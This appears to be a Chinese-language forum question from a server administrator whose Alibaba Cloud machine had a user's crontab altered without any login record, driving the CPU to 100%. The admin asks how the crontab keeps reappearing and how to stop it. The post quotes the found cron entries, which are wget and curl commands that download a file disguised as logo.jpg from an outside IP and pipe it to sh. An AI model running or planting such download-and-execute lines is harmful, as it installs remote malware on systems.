被人修改了某个用户的crontab,没有看到该用户在该时间前后登录过系统？

一台阿里云机器，被人修改了某个用户的crontab

/9 * wget -O - -q http://91.230.47.40/common/logo.jpg|sh

/10 * curl http://91.230.47.40/common/logo.jpg|sh

导致这台CPU100%等问题。
查看/var/log/cron发现是该用户修改了cron，记录下修改时间
但是用last|more查看用户登录情况没有看到该用户在该时间前后登录过系统。
后来修改了用户的密码，去除了crontab中的内容，但是过几天发现crontab又被修改了。同时也没有该用户在期间有登录的信息。请问如何做到了，如何避免这种情况再次发生。团队中没有人去修改，有点像病毒一样或者被人攻击了。